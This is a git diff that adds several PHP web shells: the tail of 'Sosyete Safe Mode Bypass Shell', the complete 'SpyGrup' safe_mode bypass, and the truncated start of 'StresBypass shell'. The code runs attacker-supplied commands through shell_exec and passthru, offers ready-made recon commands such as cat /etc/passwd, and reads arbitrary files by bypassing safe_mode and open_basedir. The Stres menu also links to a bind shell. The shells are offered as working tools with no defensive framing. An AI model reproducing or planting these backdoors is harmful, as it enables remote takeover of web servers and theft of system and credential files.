+   scrollbar-darkshadow-color: #101842;
+   scrollbar-shadow-color: #ffffff;
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff;
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+   </style>
+   </head>
+    <BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+        <center>
+        <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+        <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+    <p align="center"> </p>
+    <p align="center">
+    <a bookmark="minipanel">
+    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>
+    <br>
+        <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
+    </p>
+            <a bookmark="minipanel">
+    <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <p align="center">Sosyete Safe Mode Bypass Shell - Edited By KingDefacer
+    <b>
+        <font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
+   </p>
+        <a bookmark="minipanel">
+  <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+  <p align="center">~
+    <b>
+
+
+                <p>
+    </form>
+        </p>
+                </td>
+
+
+    </tr>
+            </table>   
+     </a>
+	 
+	 <p>
+	 
+	     <br>
+	         </p>
+	
+     <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+        <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+  <b>
+     </b>
+	 <font face="Wingdings 3" size="5"></font><b>Sosyete Safe Mode Bypass Shell ; Bypass shell'lerden esinlenerek birçok shell'in ortak karisimi olarak sunulmustur.<span lang="en-us"></span><span lang="en-us"></span> </b><font face="Wingdings 3" size="5"></font></p><p align="center"> </p></td></tr></table> 
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">
+
+        </span>
+                        </div>
+                </body>
+    </html>
+
+ <?
+
+
+echo "<b><font color=red>Sosyete Bypass Main Menu</font></b><br>";
+
+print_r('
+
+
+
+
+<pre>
+
+
+<form method="POST" action="">
+<b><font color=red> </font></b><input name="sosyete" type="text"><input value="&#199;al&#305;&#351;t&#305;r" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=red></font><select size="1" name="fuck">
+<option value=" ">Sosyete safe mode bypass shell</option>
+<option value="id;pwd">id & Dizin</option>
+<option value="ls">Dosyalar</option>
+<option value="uname -a">Server</option>
+<option value="netstat -an | grep -i listen">A&#231;&#305;k Portlar</option>
+<option value="ipconfig">A&#287; Bilgisi</option>
+<option value="ps -aux">Uygulamalar</option>
+<option value="who -q">Kullan&#305;c&#305; Say&#305;s&#305;</option>
+<option value="cat /etc/passwd">cat/etc/passwd</option>
+<option value="cat /var/cpanel/accounting.log">cat/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">cat/etc/syslog.conf</option>
+<option value="cat /etc/hosts">cat/etc/hosts</option>
+<option value="cat /etc/named.conf">cat/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">cat/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="&#199;al&#305;&#351;t&#305;r">
+</form>
+</pre>
+<style>
+   td {
+   font-family: verdana, arial, ms sans serif, sans-serif;
+   font-size: 11px;
+   color: #D5ECF9;
+   }
+   BODY {
+   margin-top: 4px;
+   margin-right: 4px;
+   margin-bottom: 4px;
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393;
+   scrollbar-3dlight-color: #000000;
+   scrollbar-darkshadow-color: #101842;
+   scrollbar-shadow-color: #ffffff;
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff;
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+    <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center"> </p>
+    <p align="center">
+<a bookmark="minipanel">
+    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina"></font><span lang="en-us"><font size="3" face="Martina"> </font>
+    <br>
+<font color="#FFFF00" face="Arial" size="7"><span lang="en-us"></span></font></p>
+</p>
+
+
+<div align="right">
+
+<span lang="en-us"> </span></div></body></html>
+
+
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$fuck=shell_exec($_POST[sosyete]); 
+$mokoko=shell_exec($_POST[fuck]); 
+echo "<pre><h4>";
+echo "<b><font color=red>Komut Sonucu </font></b><br>"; 
+echo $fuck;
+echo $mokoko;
+echo "</h4></pre>";
+
+?>
+
+</tr>
+        </table>    
+		
+		</a>
+		        <p>
+				
+	<br>
+	
+	        </p>
+			                <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+    
+	<b>
+     
+	 </b><font face="Wingdings 3" size="5"></font><b><font color="#CC0000">Sosyete Safe Mode Bypass Shell<span lang="en-us"></span> <span lang="en-us"> </span>  </b><font color="#CC0000"><b>Coded by</b> </font><b><span lang="en-us"><a href="http://www.R57.Gen.Tr"><font color="#CC0000">R57.gen.tr</a></span><font color="#CC0000"> ~ <span lang="en-us">Sosyete</span> </b><font face="Wingdings 3" size="5"> </font></p><p align="center"> </p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">
+
+</span>
+                </div>
+				                </body>
+
+</html>
diff --git a/php/spygrup.php b/php/spygrup.php
new file mode 100644
index 0000000..e2c7b83
--- /dev/null
+++ b/php/spygrup.php
@@ -0,0 +1,182 @@
+
+<head>
+ 	<meta http-equiv="Content-Language" content="en-us">
+ 	<style type="text/css">
+ <!--
+ .style1 {color: #DADADA}
+ -->
+     </style></head>
+ 	<STYLE>
+ 	TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}.style2 {color: #FF0000} 
+     </style>
+ 	<p align="center"><span class="style1"><font face="Verdana" size="5"><a href=""><span style="text-decoration: none; font-weight:700"><font face="Times New Roman">SpyGrup Safe Mod:<span class="style2">ON</span> Fucker <center><h3>RFI Olarak Kullanilmaz .PHP Olarak Host'a Yukleyiniz</h3></center></font></span></a></font></span></b></p>
+ 	<br />
+ 	<form method="POST">
+ 	    <p align="center">Okunacak Dosya:
+ 	    <input type="text" name="file" size="20">
+ 	    <input type="submit" value="Oku!" name="B1"></p>
+ 	</form>
+ 	    <form method="POST">
+ 	        <p align="center">Sunucu Bilgileri: <select size="1" name="file">
+ 	          <option value="/etc/passwd">/etc/passwd Oku</option>
+ 	          <option value="/var/cpanel/accounting.log">Cpanel Loglarini G&ouml;ster</option>
+ 	          <option value="/etc/syslog.conf">Syslog Ayarlari</option>
+ 	        <option value="/etc/hosts">Hosts</option>
+ 	        </select> <input type="submit" value="G&#246;ster Ulen!" name="B1"></p></form>
+ 	         
+                               <?php
+ 
+ 	/*
+ 	Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+ 	By KingDefacer From Spygrup.org>
+ 	*/
+ 	
+ 
+ 
+ 	$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+ 
+ 	if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+ 	{
+ 	 $safemode = true;
+ 	 $hsafemode = "<font color=\"red\">A&#231;ik (G&#252;venli)</font>";
+ 	}
+ 	else {$safemode = false; $hsafemode = "<font color=\"green\">Kapali (G&#252;venli Degil)</font>";}
+ 	echo("G&#252;venlik: $hsafemode");
+ 	$v = @ini_get("open_basedir");
+ 	if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+ 	else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">Kapali (G&#252;venli Degil)</font>";}
+ 	echo("<br>");
+ 	echo("Klas&#246;rler Arasi Dolasim: $hopenbasedir");
+ 	echo("<br>");
+ 	$version=("Bypass Version 1.1 Beta");
+ 	echo "Engelleyici Program : <b>";
+ 	if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>G&#246;r&#252;n&#252;rde Bi&#351;iy Yok</font></b>";}else{echo "<font color=red>$df</font></b>";}
+ 	$free = @diskfreespace($dir);
+ 	if (!$free) {$free = 0;}
+ 	$all = @disk_total_space($dir);
+ 	if (!$all) {$all = 0;}
+ 	$used = $all-$free;
+ 	$used_percent = @round(100/($all/$free),2);
+ 	  error_reporting(E_WARNING);
+ 	  ini_set("display_errors", 1);
+ 	
+ 
+ 	  echo "<head><title>".getcwd()."</title></head>";
+ 
+ 	  echo"<hr color=\"#C0C0C0\" size=\"1\">";
+ 	  echo("<br>");
+ 	        echo "<form method=GET>";
+ 	  echo "<div style='float: left'>ByPass Edilecek Dizin: <input type=text name=root value='{$_GET['root']}'></div>";
+ 	  echo "<input type=submit value='--&raquo;'></form>";
+ 
+ 
+ 	  $root = "./";
+ 
+ 	  if($_POST['root']) $root = $_POST['root'];
+ 	               if($_GET['root']) $root = $_GET['root'];
+ 	  if (!ini_get('safe_mode')) die("Safe-mode  OFF.");
+ 
+ 	  $c = 0; $D = array();
+ 	  set_error_handler("eh");
+ 
+ 	  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ 
+ 	  for($i=0; $i < strlen($chars); $i++){
+ 	  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
+ 
+ 	  $prevD = $D[count($D)-1];
+       glob($path."*");
+ 
+ 	        if($D[count($D)-1] != $prevD){
+ 
+ 	        for($j=0; $j < strlen($chars); $j++){
+ 
+ 	           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
+ 
+ 	           $prevD2 = $D[count($D)-1];
+ 	           glob($path."*");
+ 
+ 	              if($D[count($D)-1] != $prevD2){
+ 
+ 
+ 	                 for($p=0; $p < strlen($chars); $p++){
+ 
+ 	                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
+ 
+ 	                 $prevD3 = $D[count($D)-1];
+ 	                 glob($path."*");
+ 
+ 	                    if($D[count($D)-1] != $prevD3){
+ 
+ 
+ 	                       for($r=0; $r < strlen($chars); $r++){
+ 
+ 	                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
+ 	                       glob($path."*");
+ 
+ 	                       }
+ 
+ 	                    }
+ 
+ 	                 }
+ 
+ 	              }
+ 
+ 	        }
+ 
+ 	        }
+ 
+ 	  }
+ 
+ 	  $D = array_unique($D);
+ 
+ 	  echo "<xmp>";
+ 	  foreach($D as $item) echo "{$item}\n";
+ 	  echo "</xmp>";
+ 
+ 
+ 
+ 
+ 	  function eh($errno, $errstr, $errfile, $errline){
+ 
+ 	     global $D, $c, $i;
+ 	     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
+ 	     if($o){ $D[$c] = $o[2]; $c++;}
+ 
+ 	  }
+ 	echo "<PRE>\n";
+ 	if(empty($file)){
+ 	if(empty($_GET['file'])){
+ 	if(empty($_POST['file'])){
+ 	die("\nHosgeldiniz...Bu Scriptle Sadece c99'da  (Safe Mode=ON) Olan Serverlarda Bypass Yapilabilir Digerlerinde Calismaz  .. Kolay Gelsin\n <B><CENTER><FONT
+ 	COLOR=\"RED\">
+ 	kingdefacer@msn.com</FONT></CENTER></B>");
+ 	} else {
+ 	$file=$_POST['file'];
+ 	}
+ 	} else {
+ 	$file=$_GET['file'];
+ 	}
+ 	}
+ 
+ 	$temp=tempnam($tymczas, "cx");
+ 
+ 	if(copy("compress.zlib://".$file, $temp)){
+ 	$zrodlo = fopen($temp, "r");
+ 	$tekst = fread($zrodlo, filesize($temp));
+ 	fclose($zrodlo);
+ 	 echo"<hr color=\"#C0C0C0\" size=\"1\">";
+ 	echo "<FONT COLOR=\"RED\"><B>--- Start File ".htmlspecialchars($file)."
+ 	-------------</B><FONT COLOR=\"white\">\n".htmlspecialchars($tekst)."\n<B>--- End File
+ 	".htmlspecialchars($file)." ---------------\n";
+ 	unlink($temp);
+ 	die("\n<FONT COLOR=\"RED\"><B>File
+ 	".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>
+ 	;]</B></FONT>");
+ 	} else {
+ 	die("<FONT COLOR=\"RED\"><CENTER>Uzgunum...
+ 	<B>".htmlspecialchars($file)."</B> Aradiginiz dosya Bulunamadi
+ 	access.</CENTER></FONT>");
+ 	}
+ 
+ 	?>
\ No newline at end of file
diff --git a/php/stres.php b/php/stres.php
new file mode 100644
index 0000000..adba813
--- /dev/null
+++ b/php/stres.php
@@ -0,0 +1,926 @@
+
+<?
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          StresBypass v1.0
+/*                       --------- ----------
+/*
+/*                 By Stres // Biyosecurity.Com
+/*              ------------------------------------------------
+/*               Biyo Security Center Team
+/*            mail : stres@biyosecurity.com
+/* 
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+StresBypass shell</title>
+<style>
+   td {
+   font-family: verdana, arial, ms sans serif, sans-serif;
+   font-size: 11px;
+   color: #D5ECF9;
+   }
+   BODY {
+   margin-top: 4px;
+   margin-right: 4px;
+   margin-bottom: 4px;
+   margin-left: 4px;
+   scrollbar-face-color: #b6b5b5;
+   scrollbar-highlight-color: #758393;
+   scrollbar-3dlight-color: #000000;
+   scrollbar-darkshadow-color: #101842;
+   scrollbar-shadow-color: #ffffff;
+   scrollbar-arrow-color: #000000;
+   scrollbar-track-color: #ffffff;
+   }
+   A:link {COLOR:blue; TEXT-DECORATION: none}
+   A:visited { COLOR:blue; TEXT-DECORATION: none}
+   A:active {COLOR:blue; TEXT-DECORATION: none}
+   A:hover {color:red;TEXT-DECORATION: none}
+   input, textarea, select {
+   background-color: #EBEAEA;
+   border-style: solid;
+   border-width: 1px;
+   font-family: verdana, arial, sans-serif;
+   font-size: 11px;
+   color: #333333;
+   padding: 0px;
+   }
+  </style></head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+    <th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center"> </p>
+    <p align="center">
+<a bookmark="minipanel">
+    <font face="Webdings" size="7" color="#DCE7EF"></font></a><font size="7" face="Martina">By Stres</font><span lang="en-us"><font size="3" face="Martina"> </font>
+    <br><font size="1" face="Arial"></font></span><font color="#FFFF00" face="Arial" size="4"> <span lang="en-us">2oo8-2oo9</span>     </font>
+<font color="#FFFF00" face="Arial" size="5"><span lang="en-us">v1.0</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+    <b>
+    <?
+    $dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safemode = true;
+$hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">Kapalı ( GüvenLik Kapalı )</font>";}
+echo("Mod: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b? c?m";
+    exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">Kapalı ( GüvenLik Kapalı )</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>Açık</font></b>";}else{echo "<font color=red>Kapalı</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>Açık</font></b>";}else{echo "<font color=red>Kapalı</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>Açık</font></b>"; } else { echo "<font color=red>Kapalı</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>Hiç</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+    <p align="center"> </p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+    <b>
+</b></p>
+    <p align="center"> </p></td></tr></table>
+
+</a>
+
+
+
+</p>
+    <p align="center"><font color="#FFFF00"> </font></p>
+    <p align="center"></p>
+    </th></tr><tr>
+        <td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+        <font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial"> <?php echo php_uname(); ?> </font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial"> </font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?> </font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p align="left"><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+    </font>
+    </font>
+    <a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+    </font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br> <b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px"><font color="#FF0000" face="Verdana" size="-2">
+</font></font><font color="#FF0000" face="Verdana" size="2">
+ </font></a><font size=2 face=verdana></a></font><font face="Verdana" size="2"> </font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="1" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+    </font></a><font face="Wingdings" size="1" color="#C0C0C0">?</font><span lang="en-us"><font size="1" color="#C0C0C0" face="Webdings">
+</font></span><font face=Verdana color="white"><font color="#CC0000" size="1"><a target="\"_blank\"" style="text-decoration: none" title="??????? ???Php" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font><font size="1"></a></font></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="1">2</font></span><b><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"> </font></font><font face="verdana" color="white"><span lang="en-us"><a title="???????" href="?act=tools"><font color=#CC0000 size="1">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="1">4</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us"> </span> </font></font>
+<font face="verdana" color="white"><span lang="en-us">
+<a title="???????" href="?act=decoder"><font color=#CC0000 size="1">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="1">i</font></span></a><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us"> </span> </font>
+    </font><span lang="en-us"><font face="verdana" color="white">
+    <font color=#CC0000 size="1">
+<a title="????? ??????" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font><font size="1"></a></font></font><font face="Webdings" size="1" color="#C0C0C0">`</font></span><font size="1" face="verdana" color="white"></a></font><font size=1 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us"> </span> </font>
+    </font><font face="verdana" color="white"><span lang="en-us">
+<a title="??????? ?????? ????????" href="?act=SQL"><font color=#CC0000 size="1">SQL</font></a></span></font></b><font face="Webdings" size="1" color="#C0C0C0">?</font><b><font size="1" face="verdana" color="white"></a></font></b><font size="1"></font></font><b><font size=1 face=verdana>
+</font></b><font size="4px"><b>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="1"><span lang="en-us"> </span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="1">Bind</font></a></font></span></b><font face="Webdings" size="1" color="#C0C0C0">?</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="1"> </font>
+    </font></b></font><font face="verdana" color="white">
+    <b>
+    <span lang="en-us"><font color=#CC0000 size="1">
+<a title="????????" href="?act=help"><font color="#CC0000">help</font></a></font></span><font size="1"></a></font></b></font><b><font size="1"></a></font><font size=1 face=verdana>
+</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="1">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="1"><a title="???????" href="?act=about"><font color="#CC0000">about</font></a></font></span><font size="1"></a></font></font><font size="1"></a></font><font size=1 face=verdana>
+</font></b><span lang="en-us"><font size=1 face=Wingdings color="#C0C0C0">
+?</font></span></p>
+<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
+[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
+
+<font size="4px">
+    <font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+    <font size=-2 face=verdana color=#CC0000>server </font>
+    <font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
+    </font></a></font>
+</a></font>
+</font><b>
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF size="-2" face="verdana">]  </font>
+<font size=-2 face=verdana color=white>
+    <font size="4px" face="verdana" color="white">
+    <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+    <font face=Verdana size=-2 color="#008000">
+    CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>         </font>
